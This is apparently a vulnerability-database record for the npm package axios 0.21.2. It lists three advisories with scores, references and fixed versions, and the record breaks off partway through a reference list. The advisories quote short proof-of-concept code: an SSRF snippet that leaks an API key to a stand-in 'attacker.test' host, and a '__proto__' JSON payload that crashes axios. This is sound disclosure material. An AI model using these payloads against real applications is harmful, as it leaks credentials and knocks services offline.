Django REST framework

Package Instance

Lookup for vulnerable packages by Package URL.

Purlpkg:npm/axios@0.21.2
Typenpm
Namespace
Nameaxios
Version0.21.2
Qualifiers
Subpath
Is_vulnerabletrue
Next_non_vulnerable_version0.30.3
Latest_non_vulnerable_version1.15.0
Affected_by_vulnerabilities
0
url VCID-7rdk-mw2k-eqdx
vulnerability_id VCID-7rdk-mw2k-eqdx
summary 
Axios Cross-Site Request Forgery Vulnerability
An issue discovered in Axios 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-45857.json
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-45857.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-45857
reference_id
reference_type
scores
0
value 0.00132
scoring_system epss
scoring_elements 0.32751
published_at 2026-04-16T12:55:00Z
1
value 0.00132
scoring_system epss
scoring_elements 0.32711
published_at 2026-04-13T12:55:00Z
2
value 0.00132
scoring_system epss
scoring_elements 0.32842
published_at 2026-04-02T12:55:00Z
3
value 0.00132
scoring_system epss
scoring_elements 0.32775
published_at 2026-04-11T12:55:00Z
4
value 0.00132
scoring_system epss
scoring_elements 0.32738
published_at 2026-04-12T12:55:00Z
5
value 0.00132
scoring_system epss
scoring_elements 0.32878
published_at 2026-04-04T12:55:00Z
6
value 0.00132
scoring_system epss
scoring_elements 0.32699
published_at 2026-04-07T12:55:00Z
7
value 0.00132
scoring_system epss
scoring_elements 0.32747
published_at 2026-04-08T12:55:00Z
8
value 0.00132
scoring_system epss
scoring_elements 0.32773
published_at 2026-04-09T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-45857
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45857
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45857
3
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
4
reference_url https://github.com/axios/axios/commit/2755df562b9c194fba6d8b609a383443f6a6e967
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/commit/2755df562b9c194fba6d8b609a383443f6a6e967
5
reference_url https://github.com/axios/axios/commit/96ee232bd3ee4de2e657333d4d2191cd389e14d0
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/commit/96ee232bd3ee4de2e657333d4d2191cd389e14d0
6
reference_url https://github.com/axios/axios/issues/6006
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-09-04T15:13:57Z/
url https://github.com/axios/axios/issues/6006
7
reference_url https://github.com/axios/axios/issues/6022
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/issues/6022
8
reference_url https://github.com/axios/axios/pull/6028
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/pull/6028
9
reference_url https://github.com/axios/axios/pull/6091
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/pull/6091
10
reference_url https://github.com/axios/axios/releases/tag/v0.28.0
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/releases/tag/v0.28.0
11
reference_url https://github.com/axios/axios/releases/tag/v1.6.0
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/releases/tag/v1.6.0
12
reference_url https://security.netapp.com/advisory/ntap-20240621-0006
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20240621-0006
13
reference_url https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://security.snyk.io/vuln/SNYK-JS-AXIOS-6032459
14
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1056099
reference_id 1056099
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1056099
15
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2248979
reference_id 2248979
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2248979
16
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-45857
reference_id CVE-2023-45857
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-45857
17
reference_url https://github.com/advisories/GHSA-wf5p-g6vw-rhxx
reference_id GHSA-wf5p-g6vw-rhxx
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-wf5p-g6vw-rhxx
18
reference_url https://access.redhat.com/errata/RHSA-2024:1925
reference_id RHSA-2024:1925
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:1925
19
reference_url https://access.redhat.com/errata/RHSA-2024:3314
reference_id RHSA-2024:3314
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:3314
20
reference_url https://access.redhat.com/errata/RHSA-2024:3316
reference_id RHSA-2024:3316
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:3316
21
reference_url https://access.redhat.com/errata/RHSA-2024:3473
reference_id RHSA-2024:3473
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:3473
22
reference_url https://access.redhat.com/errata/RHSA-2024:3920
reference_id RHSA-2024:3920
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:3920
23
reference_url https://access.redhat.com/errata/RHSA-2024:4269
reference_id RHSA-2024:4269
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:4269
24
reference_url https://access.redhat.com/errata/RHSA-2024:4455
reference_id RHSA-2024:4455
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:4455
25
reference_url https://access.redhat.com/errata/RHSA-2024:5314
reference_id RHSA-2024:5314
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:5314
26
reference_url https://access.redhat.com/errata/RHSA-2025:2876
reference_id RHSA-2025:2876
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:2876
fixed_packages
0
url pkg:npm/axios@0.28.0
purl pkg:npm/axios@0.28.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-aq84-8cnz-byax
1
vulnerability VCID-hq6f-86aj-8yav
2
vulnerability VCID-x41s-g5mh-pkdq
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.28.0
1
url pkg:npm/axios@1.0.0-alpha.1
purl pkg:npm/axios@1.0.0-alpha.1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.0.0-alpha.1
2
url pkg:npm/axios@1.6.0
purl pkg:npm/axios@1.6.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-aq84-8cnz-byax
1
vulnerability VCID-epu9-wdt3-kbay
2
vulnerability VCID-hq6f-86aj-8yav
3
vulnerability VCID-x41s-g5mh-pkdq
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.6.0
aliases CVE-2023-45857, GHSA-wf5p-g6vw-rhxx
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7rdk-mw2k-eqdx
1
url VCID-hq6f-86aj-8yav
vulnerability_id VCID-hq6f-86aj-8yav
summary 
axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL
### Summary

A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463

A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠`baseURL` is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.

### Details

Consider the following code snippet:

```js
import axios from "axios";

const internalAPIClient = axios.create({
  baseURL: "http://example.test/api/v1/users/",
  headers: {
    "X-API-KEY": "1234567890",
  },
});

// const userId = "123";
const userId = "http://attacker.test/";

await internalAPIClient.get(userId); // SSRF
```

In this example, the request is sent to `http://attacker.test/` instead of the `baseURL`. As a result, the domain owner of `attacker.test` would receive the `X-API-KEY` included in the request headers.

It is recommended that:

-	When `baseURL` is set, passing an absolute URL such as `http://attacker.test/` to `get()` should not ignore `baseURL`.
-	Before sending the HTTP request (after combining the `baseURL` with the user-provided parameter), axios should verify that the resulting URL still begins with the expected `baseURL`.

### PoC

Follow the steps below to reproduce the issue:

1.	Set up two simple HTTP servers:

```
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html 
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
```


2.	Create a script (e.g., main.js):

```js
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
```

3.	Run the script:

```
$ node main.js
this is server2
```

Even though `baseURL` is set to `http://localhost:10001/`, axios sends the request to `http://localhost:10002/`.

### Impact

-	Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
-	SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
-	Affected Users: Software that uses `baseURL` and does not validate path parameters is affected by this issue.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-27152.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-27152.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-27152
reference_id
reference_type
scores
0
value 0.00072
scoring_system epss
scoring_elements 0.2207
published_at 2026-04-04T12:55:00Z
1
value 0.00072
scoring_system epss
scoring_elements 0.21881
published_at 2026-04-13T12:55:00Z
2
value 0.00072
scoring_system epss
scoring_elements 0.21938
published_at 2026-04-12T12:55:00Z
3
value 0.00072
scoring_system epss
scoring_elements 0.21978
published_at 2026-04-11T12:55:00Z
4
value 0.00072
scoring_system epss
scoring_elements 0.21965
published_at 2026-04-09T12:55:00Z
5
value 0.00072
scoring_system epss
scoring_elements 0.2191
published_at 2026-04-08T12:55:00Z
6
value 0.00072
scoring_system epss
scoring_elements 0.21835
published_at 2026-04-07T12:55:00Z
7
value 0.00072
scoring_system epss
scoring_elements 0.22018
published_at 2026-04-02T12:55:00Z
8
value 0.00232
scoring_system epss
scoring_elements 0.4609
published_at 2026-04-16T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-27152
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27152
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27152
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
5
reference_url https://github.com/axios/axios/commit/02c3c69ced0f8fd86407c23203835892313d7fde
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/commit/02c3c69ced0f8fd86407c23203835892313d7fde
6
reference_url https://github.com/axios/axios/commit/fb8eec214ce7744b5ca787f2c3b8339b2f54b00f
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/commit/fb8eec214ce7744b5ca787f2c3b8339b2f54b00f
7
reference_url https://github.com/axios/axios/issues/6463
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-07T19:32:00Z/
url https://github.com/axios/axios/issues/6463
8
reference_url https://github.com/axios/axios/pull/6829
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/pull/6829
9
reference_url https://github.com/axios/axios/releases/tag/v1.8.2
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/releases/tag/v1.8.2
10
reference_url https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6
reference_id
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-07T19:32:00Z/
url https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6
11
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-27152
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-27152
12
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1102223
reference_id 1102223
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1102223
13
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2350618
reference_id 2350618
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2350618
14
reference_url https://github.com/advisories/GHSA-jr5f-v2jv-69x6
reference_id GHSA-jr5f-v2jv-69x6
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jr5f-v2jv-69x6
fixed_packages
0
url pkg:npm/axios@0.30.0
purl pkg:npm/axios@0.30.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-aq84-8cnz-byax
1
vulnerability VCID-x41s-g5mh-pkdq
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.30.0
1
url pkg:npm/axios@1.0.0-alpha.1
purl pkg:npm/axios@1.0.0-alpha.1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.0.0-alpha.1
2
url pkg:npm/axios@1.8.2
purl pkg:npm/axios@1.8.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-aq84-8cnz-byax
1
vulnerability VCID-x41s-g5mh-pkdq
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.8.2
aliases CVE-2025-27152, GHSA-jr5f-v2jv-69x6
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-hq6f-86aj-8yav
2
url VCID-x41s-g5mh-pkdq
vulnerability_id VCID-x41s-g5mh-pkdq
summary 
Axios is Vulnerable to Denial of Service via __proto__ Key in mergeConfig
# Denial of Service via **proto** Key in mergeConfig

### Summary

The `mergeConfig` function in axios crashes with a TypeError when processing configuration objects containing `__proto__` as an own property. An attacker can trigger this by providing a malicious configuration object created via `JSON.parse()`, causing complete denial of service.

### Details

The vulnerability exists in `lib/core/mergeConfig.js` at lines 98-101:

```javascript
utils.forEach(Object.keys({ ...config1, ...config2 }), function computeConfigValue(prop) {
  const merge = mergeMap[prop] || mergeDeepProperties;
  const configValue = merge(config1[prop], config2[prop], prop);
  (utils.isUndefined(configValue) && merge !== mergeDirectKeys) || (config[prop] = configValue);
});
```

When `prop` is `'__proto__'`:

1. `JSON.parse('{"__proto__": {...}}')` creates an object with `__proto__` as an own enumerable property
2. `Object.keys()` includes `'__proto__'` in the iteration
3. `mergeMap['__proto__']` performs prototype chain lookup, returning `Object.prototype` (truthy object)
4. The expression `mergeMap[prop] || mergeDeepProperties` evaluates to `Object.prototype`
5. `Object.prototype(...)` throws `TypeError: merge is not a function`

The `mergeConfig` function is called by:

- `Axios._request()` at `lib/core/Axios.js:75`
- `Axios.getUri()` at `lib/core/Axios.js:201`
- All HTTP method shortcuts (`get`, `post`, etc.) at `lib/core/Axios.js:211,224`

### PoC

```javascript
import axios from "axios";

const maliciousConfig = JSON.parse('{"__proto__": {"x": 1}}');
await axios.get("https://httpbin.org/get", maliciousConfig);
```

**Reproduction steps:**

1. Clone axios repository or `npm install axios`
2. Create file `poc.mjs` with the code above
3. Run: `node poc.mjs`
4. Observe the TypeError crash

**Verified output (axios 1.13.4):**

```
TypeError: merge is not a function
    at computeConfigValue (lib/core/mergeConfig.js:100:25)
    at Object.forEach (lib/utils.js:280:10)
    at mergeConfig (lib/core/mergeConfig.js:98:9)
```

**Control tests performed:**
| Test | Config | Result |
|------|--------|--------|
| Normal config | `{"timeout": 5000}` | SUCCESS |
| Malicious config | `JSON.parse('{"__proto__": {"x": 1}}')` | **CRASH** |
| Nested object | `{"headers": {"X-Test": "value"}}` | SUCCESS |

**Attack scenario:**
An application that accepts user input, parses it with `JSON.parse()`, and passes it to axios configuration will crash when receiving the payload `{"__proto__": {"x": 1}}`.

### Impact

**Denial of Service** - Any application using axios that processes user-controlled JSON and passes it to axios configuration methods is vulnerable. The application will crash when processing the malicious payload.

Affected environments:

- Node.js servers using axios for HTTP requests
- Any backend that passes parsed JSON to axios configuration

This is NOT prototype pollution - the application crashes before any assignment occurs.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25639.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25639.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-25639
reference_id
reference_type
scores
0
value 0.00051
scoring_system epss
scoring_elements 0.15744
published_at 2026-04-16T12:55:00Z
1
value 0.00051
scoring_system epss
scoring_elements 0.1594
published_at 2026-04-02T12:55:00Z
2
value 0.00051
scoring_system epss
scoring_elements 0.16003
published_at 2026-04-04T12:55:00Z
3
value 0.00051
scoring_system epss
scoring_elements 0.15802
published_at 2026-04-07T12:55:00Z
4
value 0.00051
scoring_system epss
scoring_elements 0.15888
published_at 2026-04-08T12:55:00Z
5
value 0.00051
scoring_system epss
scoring_elements 0.1595
published_at 2026-04-09T12:55:00Z
6
value 0.00051
scoring_system epss
scoring_elements 0.15927
published_at 2026-04-11T12:55:00Z
7
value 0.00051
scoring_system epss
scoring_elements 0.15889
published_at 2026-04-12T12:55:00Z
8
value 0.00051
scoring_system epss
scoring_elements 0.1582
published_at 2026-04-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-25639
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25639
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25639
3
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
4
reference_url https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/
url https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57
5
reference_url https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/
url https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e
6
reference_url https://github.com/axios/axios/pull/7369
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/
url https://github.com/axios/axios/pull/7369
7
reference_url https://github.com/axios/axios/pull/7388
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/
url https://github.com/axios/axios/pull/7388
8
reference_url https://github.com/axios/axios/releases/tag/v0.30.0
reference_id
reference_type
scores
url https://github.com/axios/axios/releases/tag/v0.30.0
9
reference_url https://github.com/axios/axios/releases/tag/v0.30.3
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/
url https://github.com/axios/axios/releases/tag/v0.30.3
10
reference_url https://github.com/axios/axios/releases/tag/v1.13.5
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/
url https://github.com/axios/axios/releases/tag/v1.13.5
11
reference_url https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/
url https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433
12
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-25639
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-25639
13
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1127907
reference_id 1127907
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1127907
14
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2438237
reference_id 2438237
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2438237
15
reference_url https://github.com/advisories/GHSA-43fc-jf86-j433
reference_id GHSA-43fc-jf86-j433
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-43fc-jf86-j433
16
reference_url https://access.redhat.com/errata/RHSA-2026:2694
reference_id RHSA-2026:2694
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2694
17
reference_url https://access.redhat.com/errata/RHSA-2026:3087
reference_id RHSA-2026:3087
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3087
18
reference_url https://access.redhat.com/errata/RHSA-2026:3105
reference_id RHSA-2026:3105
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3105
19
reference_url https://access.redhat.com/errata/RHSA-2026:3106
reference_id RHSA-2026:3106
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3106
20
reference_url https://access.redhat.com/errata/RHSA-2026:3107
reference_id RHSA-2026:3107
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3107
21
reference_url https://access.redhat.com/errata/RHSA-2026:3109
reference_id RHSA-2026:3109
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3109
22
reference_url https://access.redhat.com/errata/RHSA-2026:4942
reference_id RHSA-2026:4942
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4942
23
reference_url https://access.redhat.com/errata/RHSA-2026:5142
reference_id RHSA-2026:5142
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:5142
24
reference_url https://access.redhat.com/errata/RHSA-2026:5168
reference_id RHSA-2026:5168
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:5168
25
reference_url https://access.redhat.com/errata/RHSA-2026:5174
reference_id RHSA-2026:5174
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:5174
26
reference_url https://access.redhat.com/errata/RHSA-2026:5636
reference_id RHSA-2026:5636
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:5636
27
reference_url https://access.redhat.com/errata/RHSA-2026:5665
reference_id RHSA-2026:5665
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:5665
28
reference_url https://access.redhat.com/errata/RHSA-2026:5807
reference_id RHSA-2026:5807
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:5807
29
reference_url https://access.redhat.com/errata/RHSA-2026:6170
reference_id RHSA-2026:6170
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6170
30
reference_url https://access.redhat.com/errata/RHSA-2026:6174
reference_id RHSA-2026:6174
reference_type
scores
